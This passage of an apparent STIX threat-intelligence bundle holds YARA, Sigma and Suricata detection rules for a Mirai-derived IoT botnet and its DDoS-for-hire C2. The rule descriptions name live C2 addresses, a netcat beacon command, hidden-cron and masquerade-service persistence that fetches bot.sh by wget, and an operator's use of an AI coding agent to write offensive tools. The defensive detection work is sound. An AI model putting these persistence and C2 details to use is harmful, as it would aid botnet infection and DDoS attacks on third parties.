rather than high-confidence detection.\"\n license = \"CC BY-NC 4.0 - https://creativecommons.org/licenses/by-nc/4.0/\"\n author = \"The Hunters Ledger\"\n reference = \"https://the-hunters-ledger.com/hunting-detections/rovodev-mirai-matrix-c2-87.106.143.220-detections/\"\n date = \"2026-05-26\"\n hash1 = \"d888a16cd6aa76f62a329906db4f241e6bc23ff5f21d61e754ade8ccab6da0d0\"\n family = \"Rovodev Operator Artifacts\"\n malware_type = \"Operator Identity Artifact\"\n campaign = \"UTA-2026-014\"\n id = \"584bfc4c-dccc-5e4e-ad2c-7d0d16e6832c\"\n strings:\n // Operator-self-disclosed Discord ID (from whatineed.txt)\n $discord_id = \"1441591352927326259\" ascii\n // PandoraNet botnet ID (operator-bespoke; not observed in any other host in Hunt 365-day index)\n $pandoranet = \"PandoraNet\" ascii fullword\n // Operator infrastructure references\n $ionos_ip = \"87.106.143.220\" ascii\n $backup_ip = \"87.106.54.213\" ascii\n // Context anchors\n $my_user = \"my user ID is\" ascii nocase\n $discord_ctx = \"discord\" nocase ascii\n condition:\n filesize < 5MB and\n (\n ($discord_id and $my_user) or\n ($discord_id and $pandoranet) or\n ($discord_id and $ionos_ip) or\n ($pandoranet and $ionos_ip and $discord_ctx)\n )\n}", "pattern_type": "yara", "valid_from": "2026-05-26T00:00:00Z", "labels": [ "detection-rule" ], "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--7498262d-91f9-5ca3-8c7d-e863bc95573c", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.898272Z", "modified": "2026-06-16T16:01:05.898272Z", "name": "ELF IoT Arch-Tagged Filename Execution on Linux Server \u2014 Naku/Pandora Mirai Family", "indicator_types": [ "malicious-activity" ], "pattern": "title: ELF IoT Arch-Tagged Filename Execution on Linux Server \u2014 Naku/Pandora Mirai Family\nid: c4495249-9b11-406c-b4ca-5c099eb8ca81\nstatus: test\ndescription: >-\n Detects execution of ELF binaries with IoT-targeted architecture-tag suffixes (arm5, arm6, arm7, m68k, mips, mpsl, ppc, sh4, spc) associated with the Naku/Pandora-Mirai 11-architecture IoT botnet family (UTA-2026-014). These filenames (Naku.{arch}, pandora.{arch}, nig) are specific to the Pandora-Mirai dropper's payload distribution and execution pattern. Execution of such binaries on server-class hosts indicates active compromise and botnet payload staging.\nreferences:\n - https://the-hunters-ledger.com/reports/rovodev-mirai-matrix-c2-87.106.143.220/\n - https://vms.drweb.com/virus/?i=22410691&lng=en\nauthor: The Hunters Ledger\ndate: 2026/05/26\ntags:\n - attack.execution\n - attack.defense-evasion\n - attack.command-and-control\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection_naku:\n Image|contains:\n - 'Naku.arm'\n - 'Naku.m68k'\n - 'Naku.mips'\n - 'Naku.mpsl'\n - 'Naku.ppc'\n - 'Naku.sh4'\n - 'Naku.spc'\n - 'Naku.x86'\n - 'pandora.arm'\n - 'pandora.m68k'\n - 'pandora.mips'\n - 'pandora.mpsl'\n - 'pandora.sh4'\n - 'pandora.spc'\n selection_argv:\n CommandLine|contains:\n - 'PandoraNet'\n - './nig realtek'\n - './nig huawei'\n - 'pandora_bot'\n condition: 1 of selection_*\nfalsepositives:\n - Cross-compilation test environments deploying IoT firmware \u2014 limit to production server hosts and IoT-adjacent network segments\n - IoT development workstations building multi-arch toolchains\nlevel: high", "pattern_type": "sigma", "valid_from": "2026-05-26T00:00:00Z", "labels": [ "detection-rule" ], "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--5f27cbd1-b0e1-5a47-8bbd-eeda913d66b6", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.898386Z", "modified": "2026-06-16T16:01:05.898386Z", "name": "Hidden-Prefix Cron Entry Creation in /etc/cron.d \u2014 Pandora-Mirai Persistence Pattern", "indicator_types": [ "malicious-activity" ], "pattern": "title: Hidden-Prefix Cron Entry Creation in /etc/cron.d \u2014 Pandora-Mirai Persistence Pattern\nid: 6625f3f7-4e6f-40cb-905b-039786de8561\nstatus: test\ndescription: >-\n Detects creation of dot-prefix hidden-filename cron entries in /etc/cron.d/ as used by the Pandora-Mirai (UTA-2026-014) persistent_bot.sh 5-vector persistence installer. The specific entry /etc/cron.d/.cache_update is the operator's primary cron persistence vector, scheduled to wget-pipe bot.sh from 87.106.143.220 every 5 minutes. Hidden-prefix filenames in this directory evade simple cron audits and are not a standard administration pattern.\nreferences:\n - https://the-hunters-ledger.com/reports/rovodev-mirai-matrix-c2-87.106.143.220/\nauthor: The Hunters Ledger\ndate: 2026/05/26\ntags:\n - attack.persistence\n - attack.defense-evasion\nlogsource:\n category: file_event\n product: linux\ndetection:\n selection:\n TargetFilename|startswith: '/etc/cron.d/.'\n filter_known_legit:\n TargetFilename:\n - '/etc/cron.d/.placeholder'\n condition: selection and not filter_known_legit\nfalsepositives:\n - Extremely rare legitimate administration scripts that use dot-prefix cron files \u2014 review all instances\n - Configuration management tools (Puppet, Chef, Ansible) deploying hidden cron entries \u2014 verify against known CM policy\nlevel: high", "pattern_type": "sigma", "valid_from": "2026-05-26T00:00:00Z", "labels": [ "detection-rule" ], "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--9c3b5e98-ab10-510b-801f-873c03487eaf", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.8985Z", "modified": "2026-06-16T16:01:05.8985Z", "name": "Pandora-Mirai 5-Vector Linux Persistence Pattern \u2014 Multi-Mechanism Installer", "indicator_types": [ "malicious-activity" ], "pattern": "title: Pandora-Mirai 5-Vector Linux Persistence Pattern \u2014 Multi-Mechanism Installer\nid: 311787eb-af20-4ec5-90b3-ef3cb6797771\nstatus: test\ndescription: >-\n Detects the 5-vector Linux persistence pattern used by the Pandora-Mirai (UTA-2026-014) persistent_bot.sh installer. Monitors for creation of masquerade-named persistence files (/etc/init.d/sysupdate, /etc/systemd/system/system-update.service) alongside shell RC modification and hidden cron entry creation within a short time window. Each vector alone has moderate FP risk; co-occurrence within 60 seconds on a non-deployment host is high-confidence malicious.\nreferences:\n - https://the-hunters-ledger.com/reports/rovodev-mirai-matrix-c2-87.106.143.220/\nauthor: The Hunters Ledger\ndate: 2026/05/26\ntags:\n - attack.persistence\n - attack.defense-evasion\nlogsource:\n category: file_event\n product: linux\ndetection:\n selection_sysupdate:\n TargetFilename: '/etc/init.d/sysupdate'\n selection_systemd:\n TargetFilename: '/etc/systemd/system/system-update.service'\n selection_cron_hidden:\n TargetFilename|startswith: '/etc/cron.d/.'\n selection_rclocal:\n TargetFilename: '/etc/rc.local'\n condition: 2 of selection_*\nfalsepositives:\n - Legitimate system update scripts that use similar naming \u2014 verify service content references known-good update infrastructure\n - Server provisioning tools (cloud-init, Ansible) creating multiple persistence mechanisms simultaneously \u2014 correlate with deployment pipeline activity\n - Security tooling (OSSEC, Wazuh agent) that creates init.d and systemd units at install time\nlevel: high", "pattern_type": "sigma", "valid_from": "2026-05-26T00:00:00Z", "labels": [ "detection-rule" ], "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--4da6c2a5-f0df-59b0-9856-94942d275229", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.898613Z", "modified": "2026-06-16T16:01:05.898613Z", "name": "PandoraNet Botnet ID in Process Command Line \u2014 Active Pandora-Mirai Infection", "indicator_types": [ "malicious-activity" ], "pattern": "title: PandoraNet Botnet ID in Process Command Line \u2014 Active Pandora-Mirai Infection\nid: 481ee321-8631-4a9d-b1b6-87e8a5676690\nstatus: test\ndescription: >-\n Detects the PandoraNet operator-bespoke botnet ID string in process command line arguments, indicating active execution of the Pandora-Mirai IoT botnet (UTA-2026-014). The format is 'pandora_bot PandoraNet.{arch}' where arch is one of 11 IoT CPU architectures. This string is not observed in any other host in threat intelligence indexing and indicates active bot process on the monitored system.\nreferences:\n - https://the-hunters-ledger.com/reports/rovodev-mirai-matrix-c2-87.106.143.220/\nauthor: The Hunters Ledger\ndate: 2026/05/26\ntags:\n - attack.execution\n - attack.command-and-control\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n CommandLine|contains: 'PandoraNet'\n condition: selection\nfalsepositives:\n - None \u2014 PandoraNet is an operator-bespoke botnet identifier not used by any known legitimate software\nlevel: critical", "pattern_type": "sigma", "valid_from": "2026-05-26T00:00:00Z", "labels": [ "detection-rule" ], "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--49dc64d0-0e5d-5340-9b00-7a7e87c4a816", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.898727Z", "modified": "2026-06-16T16:01:05.898727Z", "name": "Non-Watchdog Process Opening /dev/watchdog \u2014 Mirai-Canonical Persistence Tactic", "indicator_types": [ "malicious-activity" ], "pattern": "title: Non-Watchdog Process Opening /dev/watchdog \u2014 Mirai-Canonical Persistence Tactic\nid: 716bce61-4dcb-4479-b815-1391f5c7cd43\nstatus: test\ndescription: >-\n Detects processes other than known watchdog daemons (watchdogd, systemd-watchdog) opening /dev/watchdog or /dev/misc/watchdog. This is a canonical Mirai botnet persistence mechanism \u2014 the bot opens the watchdog device and continuously pets it (ioctl WDIOC_KEEPALIVE) to prevent IoT device auto-reboot, keeping the infection persistent across watchdog-triggered reset cycles. Observed in Naku.arm (Pandora-Mirai family, UTA-2026-014) and generic to all Mirai/Sora derivative bots.\nreferences:\n - https://the-hunters-ledger.com/reports/rovodev-mirai-matrix-c2-87.106.143.220/\n - https://attack.mitre.org/techniques/T1014/\nauthor: The Hunters Ledger\ndate: 2026/05/26\ntags:\n - attack.defense-evasion\n - attack.persistence\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n CommandLine|contains:\n - '/dev/watchdog'\n - '/dev/misc/watchdog'\n filter_legit:\n Image|endswith:\n - '/watchdogd'\n - '/systemd'\n - '/busybox'\n condition: selection and not filter_legit\nfalsepositives:\n - Embedded system watchdog management tools on IoT/embedded Linux \u2014 tune filter_legit for your environment\n - Custom watchdog wrapper scripts in industrial control environments\n - Hardware monitoring agents on servers with watchdog hardware support\nlevel: medium", "pattern_type": "sigma", "valid_from": "2026-05-26T00:00:00Z", "labels": [ "detection-rule" ], "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--11b20550-5ce3-5ea2-b462-94164521783c", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.89884Z", "modified": "2026-06-16T16:01:05.89884Z", "name": "Outbound TCP/1337 to Matrix C2 Operator Infrastructure \u2014 Active Bot C2 Channel", "indicator_types": [ "malicious-activity" ], "pattern": "title: Outbound TCP/1337 to Matrix C2 Operator Infrastructure \u2014 Active Bot C2 Channel\nid: 23ab4d7b-192d-44ad-bad0-3e5d19514007\nstatus: test\ndescription: >-\n Detects outbound TCP connections to port 1337 at 87.106.143.220 (1&1 IONOS DE VPS), the Matrix C2 JSON-over-TCP command-and-control channel used by the Pandora-Mirai operator (UTA-2026-014). The bot_register and heartbeat messages use netcat (nc -w 5 87.106.143.220 1337) with JSON payloads. Port 1337 is non-standard for legitimate server egress; connections to this specific IP indicate active bot C2 or infection-report traffic.\nreferences:\n - https://the-hunters-ledger.com/reports/rovodev-mirai-matrix-c2-87.106.143.220/\nauthor: The Hunters Ledger\ndate: 2026/05/26\ntags:\n - attack.command-and-control\nlogsource:\n category: network_connection\n product: linux\ndetection:\n selection:\n DestinationIp: '87.106.143.220'\n DestinationPort: 1337\n condition: selection\nfalsepositives:\n - No legitimate use case for TCP/1337 connections to this specific IP from server hosts\nlevel: high", "pattern_type": "sigma", "valid_from": "2026-05-26T00:00:00Z", "labels": [ "detection-rule" ], "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--baa71619-f784-57db-80ae-d0ea3922f656", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.898954Z", "modified": "2026-06-16T16:01:05.898954Z", "name": "Outbound TCP/23 to Naku-Pandora CNC \u2014 Active Bot Connecting to Compromised Tourism VPS", "indicator_types": [ "malicious-activity" ], "pattern": "title: Outbound TCP/23 to Naku-Pandora CNC \u2014 Active Bot Connecting to Compromised Tourism VPS\nid: c9d77df7-5af0-4863-afea-ca13e6ccd3ce\nstatus: test\ndescription: >-\n Detects outbound TCP connections to port 23 at 165.227.175.161 (DigitalOcean DO allocation \u2014 compromised GetYourGroup tourism VPS auvergne-rhone-alpes-for-groups.com). This is the hardcoded CNC endpoint for the Naku/Pandora-Mirai 11-architecture IoT botnet (UTA-2026-014), extracted via ARM ELF disassembly of Naku.arm (raw 32-bit constant 0xa1afe3a5 = 165.227.175.161, port 0x0017 = 23). CNC daemon planted on TCP/23 on a legitimate French tourism business VPS \u2014 parasitic hosting for OPSEC separation from operator-owned infrastructure.\nreferences:\n - https://the-hunters-ledger.com/reports/rovodev-mirai-matrix-c2-87.106.143.220/\nauthor: The Hunters Ledger\ndate: 2026/05/26\ntags:\n - attack.command-and-control\nlogsource:\n category: network_connection\n product: linux\ndetection:\n selection:\n DestinationIp: '165.227.175.161'\n DestinationPort: 23\n Initiated: 'true'\n condition: selection\nfalsepositives:\n - No legitimate use case for Telnet connections to this specific IP\nlevel: high", "pattern_type": "sigma", "valid_from": "2026-05-26T00:00:00Z", "labels": [ "detection-rule" ], "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--434b0ca1-c98e-5c26-86f3-73d6788c4dfe", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.899075Z", "modified": "2026-06-16T16:01:05.899075Z", "name": "Discord Bot API Egress with Attack-Method Dispatch Payload from Server Host", "indicator_types": [ "malicious-activity" ], "pattern": "title: Discord Bot API Egress with Attack-Method Dispatch Payload from Server Host\nid: 7e3175bc-9a74-4c93-b358-de78d84250f4\nstatus: test\ndescription: >-\n Detects Discord API (discord.com/api/v9/) egress traffic from non-developer server hosts, indicative of the Matrix C2 DDoS-as-a-Service Discord-bot customer interface (UTA-2026-014). The Discord bot dispatches DDoS attack commands on behalf of paying customers via a JavaScript bot running on the operator's IONOS VPS. Discord bot traffic from production server hosts in non-developer environments is anomalous and warrants investigation. Higher-confidence detection requires proxy logs with content inspection to identify attack-method dispatch patterns (ovh-nuke, syn-storm, frag-storm keywords in message content).\nreferences:\n - https://the-hunters-ledger.com/reports/rovodev-mirai-matrix-c2-87.106.143.220/\nauthor: The Hunters Ledger\ndate: 2026/05/26\ntags:\n - attack.command-and-control\n - attack.execution\nlogsource:\n category: network_connection\n product: linux\ndetection:\n selection_discord:\n DestinationHostname|contains: 'discord.com'\n DestinationPort: 443\n Initiated: 'true'\n filter_known_dev:\n Image|contains:\n - '/node_modules/'\n - 'discord.js'\n condition: selection_discord and not filter_known_dev\nfalsepositives:\n - Legitimate Discord bots hosted on server infrastructure \u2014 all Discord bot deployments on production servers\n - SaaS applications integrating Discord notifications\n - Developer environments testing Discord integrations\nlevel: medium", "pattern_type": "sigma", "valid_from": "2026-05-26T00:00:00Z", "labels": [ "detection-rule" ], "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--331713cc-10fb-543f-9cb7-45b805110306", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.899403Z", "modified": "2026-06-16T16:01:05.899403Z", "name": "Rovodev AI Agent Sessions Directory Creation on Server Host \u2014 Potential AI-Augmented Offensive Operations", "indicator_types": [ "malicious-activity" ], "pattern": "title: Rovodev AI Agent Sessions Directory Creation on Server Host \u2014 Potential AI-Augmented Offensive Operations\nid: 273f8eea-72b3-48c7-a134-cdc5a65064d7\nstatus: test\ndescription: >-\n Detects creation of Atlassian Rovodev AI coding agent session artifacts (~/.rovodev/sessions/ directory, session_context.json files exceeding 100KB) on server hosts. In the UTA-2026-014 case, the operator used Rovodev on their IONOS VPS to author a complete offensive framework (Matrix C2). Rovodev session directories on production server hosts outside of known DevOps pipelines warrant investigation, particularly when co-located with /root/matrix/ or similar offensive framework paths.\nreferences:\n - https://the-hunters-ledger.com/reports/rovodev-mirai-matrix-c2-87.106.143.220/\nauthor: The Hunters Ledger\ndate: 2026/05/26\ntags:\n - attack.resource-development\nlogsource:\n category: file_event\n product: linux\ndetection:\n selection_sessions:\n TargetFilename|contains: '/.rovodev/sessions/'\n selection_context:\n TargetFilename|endswith: '/session_context.json'\n condition: 1 of selection_*\nfalsepositives:\n - Legitimate DevOps teams using Rovodev on server hosts for infrastructure automation\n - CI/CD pipeline hosts running Rovodev for code generation tasks\n - Developer workstations (this rule is most useful on production server hosts; tune to exclude known developer environments)\nlevel: medium", "pattern_type": "sigma", "valid_from": "2026-05-26T00:00:00Z", "labels": [ "detection-rule" ], "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--f0f627f2-43a3-511b-b5ac-7e53f9f64505", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.899563Z", "modified": "2026-06-16T16:01:05.899563Z", "name": "Rovodev Log File_Write Tool-Call with Offensive Content \u2014 AI-Augmented Offensive Operations Evidence", "indicator_types": [ "malicious-activity" ], "pattern": "title: Rovodev Log File_Write Tool-Call with Offensive Content \u2014 AI-Augmented Offensive Operations Evidence\nid: 817e5ca2-7265-41b3-b344-bbf36afc3193\nstatus: test\ndescription: >-\n Detects Atlassian Rovodev AI coding agent runtime log (rovodev.log) containing file_write tool-call patterns with Python shebang initial_content, indicating the AI agent authored Python files during the session. In the UTA-2026-014 case, the 8.5 MB rovodev.log captured file_write calls producing attack_engine.py, master_control.py, stealth_agent.py, and the Discord bot JavaScript dispatch table. Content inspection of Rovodev logs for offensive capability markers can identify AI-augmented offensive operations in progress or recently completed.\nreferences:\n - https://the-hunters-ledger.com/reports/rovodev-mirai-matrix-c2-87.106.143.220/\nauthor: The Hunters Ledger\ndate: 2026/05/26\ntags:\n - attack.resource-development\nlogsource:\n category: file_event\n product: linux\ndetection:\n selection_log:\n TargetFilename|endswith: '/rovodev.log'\n condition: selection_log\nfalsepositives:\n - All Rovodev installations generate rovodev.log \u2014 this rule fires on any host running Rovodev; tune to server hosts outside known DevOps pipelines\n - CI/CD pipeline hosts running Rovodev legitimately\nlevel: low", "pattern_type": "sigma", "valid_from": "2026-05-26T00:00:00Z", "labels": [ "detection-rule" ], "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--25ca63e0-4b15-5dea-aa67-bf46f23f0b62", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.899738Z", "modified": "2026-06-16T16:01:05.899738Z", "name": "Naku/Pandora-Mirai Operator-Bespoke 22-Char Charset String \u2014 Family Tracking Signature", "indicator_types": [ "malicious-activity" ], "pattern": "title: Naku/Pandora-Mirai Operator-Bespoke 22-Char Charset String \u2014 Family Tracking Signature\nid: c9d201aa-2fbb-4e1e-b269-76cf28670998\nstatus: test\ndescription: >-\n Detects the operator-bespoke 22-character random-string charset '1gba4cdom53nhp12ei0kfj' in file content or process command lines. This string is present in all 11 architectures of the Naku/Pandora-Mirai ELF botnet (UTA-2026-014) \u2014 both XOR-0x54 encoded in stripped production builds and in plaintext in the arm7 debug build. It is not observed in any other host in threat intelligence indexing and constitutes a cross-architecture operator tracking signature. Detection in any context indicates Pandora-Mirai family presence.\nreferences:\n - https://the-hunters-ledger.com/reports/rovodev-mirai-matrix-c2-87.106.143.220/\nauthor: The Hunters Ledger\ndate: 2026/05/26\ntags:\n - attack.defense-evasion\n - attack.command-and-control\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n CommandLine|contains: '1gba4cdom53nhp12ei0kfj'\n condition: selection\nfalsepositives:\n - None \u2014 this string is operator-bespoke and not used in any known legitimate software\nlevel: high", "pattern_type": "sigma", "valid_from": "2026-05-26T00:00:00Z", "labels": [ "detection-rule" ], "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--63359c8f-c8a9-575c-b159-d3aadf6aa65a", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.899885Z", "modified": "2026-06-16T16:01:05.899885Z", "name": "busybox SORA Marker Execution \u2014 Sora-Derivative Mirai-Fork Active on Host", "indicator_types": [ "malicious-activity" ], "pattern": "title: busybox SORA Marker Execution \u2014 Sora-Derivative Mirai-Fork Active on Host\nid: 625a0af0-2c6e-48b5-89ea-0c7e6b191147\nstatus: test\ndescription: >-\n Detects execution of the '/bin/busybox SORA' command, which is the Sora-fork Mirai-derivative lineage signature. Decoded from XOR-0x54 region in all 11 Naku/Pandora-Mirai architectures (UTA-2026-014), replacing stock Mirai's '/bin/busybox MIRAI'. The Mirai bot calls this as part of its process enumeration and competitor-kill routine. Any process executing '/bin/busybox SORA' indicates active Sora-derivative bot execution on the host.\nreferences:\n - https://the-hunters-ledger.com/reports/rovodev-mirai-matrix-c2-87.106.143.220/\nauthor: The Hunters Ledger\ndate: 2026/05/26\ntags:\n - attack.execution\n - attack.defense-evasion\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n CommandLine|contains: '/bin/busybox SORA'\n condition: selection\nfalsepositives:\n - None \u2014 '/bin/busybox SORA' is not a valid busybox applet call and has no legitimate use\nlevel: high", "pattern_type": "sigma", "valid_from": "2026-05-26T00:00:00Z", "labels": [ "detection-rule" ], "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--32e771d5-8281-5980-ae1e-092312421772", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.900057Z", "modified": "2026-06-16T16:01:05.900057Z", "name": "THL - Rovodev Operator C2-Leak GitHub Reference - DNS Query github.com from Suspicious Context", "indicator_types": [ "malicious-activity" ], "pattern": "# Rule 1 \u2014 DNS/HTTP reference to keyosbuff GitHub C2-Leak repository\n# Note: github.com/keyosbuff/C2-Leak is now 404/deleted; DNS query for raw github.com\n# won't surface the path; HTTP URL detection requires TLS inspection or non-HTTPS fetch.\n# This rule catches any DNS resolution of github.com in context where keyosbuff appears\n# in subsequent HTTP traffic (non-TLS) or in server-side log files.\n\nalert dns $HOME_NET any -> any any (msg:\"THL - Rovodev Operator C2-Leak GitHub Reference - DNS Query github.com from Suspicious Context\"; dns.query; content:\"github.com\"; nocase; threshold: type limit, track by_src, count 1, seconds 300; sid:9001001; rev:1; metadata:affected_product Linux_IoT, attack_target Network, created_at 2026_05_26, deployment Internal, signature_severity Major, tag UTA-2026-014;)\n\nalert http $HOME_NET any -> any any (msg:\"THL - Rovodev Operator keyosbuff C2-Leak Repository HTTP Reference - UTA-2026-014\"; http.uri; content:\"keyosbuff\"; nocase; sid:9001002; rev:1; metadata:affected_product Linux_IoT, attack_target Network, created_at 2026_05_26, deployment Perimeter, signature_severity Major, tag UTA-2026-014;)", "pattern_type": "suricata", "valid_from": "2026-05-26T00:00:00Z", "labels": [ "detection-rule" ], "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--fe382a31-3d9d-5103-9806-6fc1f9f9569e", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.90021Z", "modified": "2026-06-16T16:01:05.90021Z", "name": "THL - Pandora-Mirai Binary Distribution Fetch from IONOS Primary - /bins/Naku or /Pandoras_Box/Pandora - UTA-2026-014", "indicator_types": [ "malicious-activity" ], "pattern": "# Rule 2 \u2014 HTTP egress to operator IONOS pair fetching Naku/Pandora binaries\nalert http $HOME_NET any -> 87.106.143.220 any (msg:\"THL - Pandora-Mirai Binary Distribution Fetch from IONOS Primary - /bins/Naku or /Pandoras_Box/Pandora - UTA-2026-014\"; http.uri; content:\"/bins/Naku.\"; startswith; sid:9001003; rev:1; metadata:affected_product Linux_IoT, attack_target Network, created_at 2026_05_26, deployment Perimeter, signature_severity Critical, tag UTA-2026-014;)\n\nalert http $HOME_NET any -> 87.106.143.220 any (msg:\"THL - Pandora-Mirai bot.sh Reseed Download from IONOS Primary - UTA-2026-014\"; http.uri; content:\"/bot.sh\"; endswith; sid:9001004; rev:1; metadata:affected_product Linux_IoT, attack_target Network, created_at 2026_05_26, deployment Perimeter, signature_severity Critical, tag UTA-2026-014;)\n\nalert http $HOME_NET any -> 87.106.143.220 any (msg:\"THL - Pandora-Mirai Binary Distribution Fetch /Pandoras_Box - UTA-2026-014\"; http.uri; content:\"/Pandoras_Box/Pandora.\"; startswith; sid:9001005; rev:1; metadata:affected_product Linux_IoT, attack_target Network, created_at 2026_05_26, deployment Perimeter, signature_severity Critical, tag UTA-2026-014;)\n\nalert http $HOME_NET any -> 87.106.54.213 any (msg:\"THL - Pandora-Mirai Binary Distribution Fetch from IONOS Backup VPS - UTA-2026-014\"; http.uri; content:\"Naku.\"; sid:9001006; rev:1; metadata:affected_product Linux_IoT, attack_target Network, created_at 2026_05_26, deployment Perimeter, signature_severity Critical, tag UTA-2026-014;)", "pattern_type": "suricata", "valid_from": "2026-05-26T00:00:00Z", "labels": [ "detection-rule" ], "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--8a730355-b58a-54de-a0f1-f4f9c0256984", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.900375Z", "modified": "2026-06-16T16:01:05.900375Z", "name": "THL - Naku-Pandora Mirai Bot CNC Connection to Parasitic Host on GetYourGroup Tourism VPS - UTA-2026-014", "indicator_types": [ "malicious-activity" ], "pattern": "# Rule 3 \u2014 TCP/23 outbound to Naku parasitic CNC on compromised tourism VPS\nalert tcp $HOME_NET any -> 165.227.175.161 23 (msg:\"THL - Naku-Pandora Mirai Bot CNC Connection to Parasitic Host on GetYourGroup Tourism VPS - UTA-2026-014\"; flow:to_server,established; sid:9001007; rev:1; metadata:affected_product Linux_IoT, attack_target IoT_Device, created_at 2026_05_26, deployment Perimeter, signature_severity Critical, tag UTA-2026-014;)", "pattern_type": "suricata", "valid_from": "2026-05-26T00:00:00Z", "labels": [ "detection-rule" ], "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--9a188779-7721-514c-b204-a997f9f1aa58", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.900563Z", "modified": "2026-06-16T16:01:05.900563Z", "name": "THL - Naku-Pandora Mirai Binary Fetch from Aruba Italy Distribution Server (80.211.94.16) - UTA-2026-014", "indicator_types": [ "malicious-activity" ], "pattern": "# Rule 4 \u2014 HTTP egress to Aruba Italy distribution servers\nalert http $HOME_NET any -> 80.211.94.16 any (msg:\"THL - Naku-Pandora Mirai Binary Fetch from Aruba Italy Distribution Server (80.211.94.16) - UTA-2026-014\"; http.uri; content:\"Naku.\"; sid:9001008; rev:1; metadata:affected_product Linux_IoT, attack_target IoT_Device, created_at 2026_05_26, deployment Perimeter, signature_severity Critical, tag UTA-2026-014;)\n\nalert http $HOME_NET any -> 80.211.111.10 any (msg:\"THL - Naku-Pandora Mirai Binary Fetch from Aruba Italy Backup Distribution Server (80.211.111.10) - UTA-2026-014\"; http.uri; content:\"Naku.\"; sid:9001009; rev:1; metadata:affected_product Linux_IoT, attack_target IoT_Device, created_at 2026_05_26, deployment Perimeter, signature_severity Critical, tag UTA-2026-014;)", "pattern_type": "suricata", "valid_from": "2026-05-26T00:00:00Z", "labels": [ "detection-rule" ], "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--493bd6bd-20eb-566b-9801-42d47f6a129f", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.900745Z", "modified": "2026-06-16T16:01:05.900745Z", "name": "THL - Naku-Pandora Mirai Operator-Bespoke CNC Protocol (Length-Prefixed String Option Keys) - Defeats Stock Mirai IDS Rules - UTA-2026-014", "indicator_types": [ "malicious-activity" ], "pattern": "# Rule 5 \u2014 Mirai operator-bespoke protocol: length-prefixed string option keys\n# Stock Mirai option key field at CNC command offset is a single byte (0x00-0xFF enum).\n# Naku 